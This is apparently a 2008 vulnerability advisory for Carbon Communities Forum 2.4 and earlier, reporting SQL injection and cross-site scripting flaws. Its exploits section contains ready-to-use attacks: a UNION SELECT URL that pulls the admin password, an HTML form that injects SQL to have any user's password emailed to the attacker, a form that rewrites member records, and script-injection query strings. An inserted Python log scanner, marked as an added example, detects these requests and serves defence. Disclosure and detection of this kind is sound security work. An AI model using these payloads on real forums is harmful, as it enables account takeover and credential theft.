
carboncom-multi.txt
Posted Apr 16, 2008
Authored by AmnPardaz Security Research Team | Site bugreport.ir

Carbon Communities Forum versions 2.4 and below suffer from SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | ec8b6da167cb0ac04f04778c691d037a9cd993aa0d5833d3b0c4f5594180c62e

########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: Multiple Vulnerabilities in Carbon Communities forum.
# Vendor: www.carboncommunities.com
# Vulnerable Version: 2.4 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/35
###################################################################################


####################
1. Description:
####################
Carbon Communities is a high-powered, fully scalable, and highly customizable online portal, with message boards/bulletin boards, a discussion hub, private messaging, event calendars, email and chat software rolled into one.

####################
2. Vulnerability:
####################
2.1. There is a SQL injection in "events.asp?id=[Injection]". Using it, an attacker can obtain usernames and passwords.
2.1.1. POC:
Check exploits section.
2.2. There is a SQL injection in "getpassword.asp". Using it, an attacker can have any password sent to his/her email address (exploit available).
2.2.1. POC:
Check exploits section.
2.3. There is a SQL injection in "option_Update.asp". Using it, an attacker can update member info (exploit available).
2.3.1. POC:
Check exploits section.
2.4. There are XSS vulnerabilities in "login.asp" and "member_send.asp".
2.4.1. POC:
/login.asp?Redirect='><script>alert('XSS')</script><fake a='
/member_send.asp?OrderBy='><script>alert('XSS')</script><fake a='
####################
3. Exploits:
####################

Original Exploit URL: http://bugreport.ir/index.php?/35/exploit

3.1. Attacker can gain usernames and passwords:
-------------
http://[CarbonCommunitiesURL]/events.asp?ID=-1 union all select 1,1,1,'Username= '%2bmember_name%2b'<br>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name = 'admin'
-------------
3.2. Attacker can send any password to his/her email address:
-------------
<script language="javascript">
function check(){
document.getElementById("UserName").value = "1' or uCase(Member_Name)='"+ document.getElementById("UserName").value
}
</script>
<form action="http://[CarbonCommunitiesURL]/getpassword.asp" method="post" onsubmit="check()">
UserName: <input type="text" name="UserName" id="UserName" value="default" size="100" />
<br />
EMail: <input type="text" name="EMail" value="Your Email Address" size="100" />
<br />
<input type="submit" />
</form>
-------------
3.3. Attacker can update member info.:
-------------
<form action="http://[CarbonCommunitiesURL]/option_Update.asp?Action=edit" method="post">
ID<input type="text" name="ID" value="1"/>
<br />
Member_Cookies<input type="text" name="Member_Cookies" value="Yes" />
<br />
Member_SystemCookies<input type="text" name="Member_SystemCookies" value="Yes" />
<br />
Member_Center<input type="text" name="Member_Center" value="1" />
<br />
Member_EmailTheadResponse<input type="text" name="Member_EmailTheadResponse" value="1" />
<br />
Member_EmailPostResponse<input type="text" name="Member_EmailPostResponse" value="1" />
<br />
Member_WeekStart<input type="text" name="Member_WeekStart" value="0" />
<br />
Member_ThreadDays<input type="text" name="Member_ThreadDays" value="0" />
<br />
Member_ThreadView<input type="text" name="Member_ThreadView" value="0" />
<br />
Member_Invisible<input type="text" name="Member_Invisible" value="1" />
<br />
Member_HiddenEmail<input type="text" name="Member_HiddenEmail" value="0" />
<br />
Member_ReceivePM<input type="text" name="Member_ReceivePM" value="1" />
<br />
Member_PMEmailNotice<input type="text" name="Member_PMEmailNotice" value="1" />
<br />
Member_PMPopup<input type="text" name="Member_PMPopup" value="1" />
<br />
Member_Newsletter<input type="text" name="Member_Newsletter" value="0" />
<br />
Member_TimeZone<input type="text" name="Member_TimeZone" value="0" />
<br />
Member_DefaultColor<input type="text" name="Member_DefaultColor" value="1" />
<br />
<input type="submit" />
</form>
-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitised.
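
Since the advisory lists no vendor fix, operators may want to check access logs for requests matching the GET-based issues above. The following is an added example, not part of the original advisory or the vendor's code: it applies the same per-parameter checks a server-side fix would enforce (integer-only ID, no markup in Redirect/OrderBy) to log lines. The W3C field order, rule wording and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed W3C extended log field order (IIS lets the operator change it).
FIELDS = ("date", "time", "c_ip", "method", "stem", "query", "status")
MARKUP = re.compile(r"[<>'\"]")   # characters needed to break out of an HTML attribute
INTEGER = re.compile(r"-?\d+")

# GET parameters named in the advisory, keyed by lower-cased script path.
RULES = {
    "/events.asp": ("id", lambda v: not INTEGER.fullmatch(v), "non-integer ID"),
    "/login.asp": ("redirect", lambda v: bool(MARKUP.search(v)), "markup in Redirect"),
    "/member_send.asp": ("orderby", lambda v: bool(MARKUP.search(v)), "markup in OrderBy"),
}
# These two are reached through POST bodies, which access logs do not record.
POST_ONLY = {"/getpassword.asp", "/option_update.asp"}

def scan_line(line):
    """Return (client_ip, path, reason) findings for one access-log line."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return []
    rec = dict(zip(FIELDS, parts))
    stem, findings = rec["stem"].lower(), []
    if stem in POST_ONLY and rec["method"] == "POST":
        findings.append((rec["c_ip"], stem, "POST body not logged, review manually"))
    rule = RULES.get(stem)
    if rule and rec["query"] != "-":
        name, is_bad, reason = rule
        # parse_qs URL-decodes values; ASP treats parameter names case-insensitively.
        params = {k.lower(): v for k, v in parse_qs(rec["query"], keep_blank_values=True).items()}
        findings += [(rec["c_ip"], stem, reason) for v in params.get(name, []) if is_bad(v.strip())]
    return findings

def scan(lines):
    return [f for line in lines for f in scan_line(line)]

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-04-16 10:00:01 192.0.2.10 GET /events.asp ID=42 200",
    "2008-04-16 10:00:07 198.51.100.7 GET /events.asp ID=-1%20union%20all%20select%201,1,1 200",
    "2008-04-16 10:01:12 192.0.2.10 GET /login.asp Redirect=default.asp 200",
    "2008-04-16 10:02:30 198.51.100.7 GET /login.asp Redirect=%27%3E%3Cscript%3E 200",
    "2008-04-16 10:03:02 198.51.100.7 POST /option_Update.asp Action=edit 200",
]

if __name__ == "__main__":
    for ip, path, reason in scan(SAMPLE_LOG):
        print(ip, path, reason)
```

The getpassword.asp and option_Update.asp issues travel in POST bodies, so the script can only flag that such a request occurred; confirming abuse there needs request-body logging or database audit data.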
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com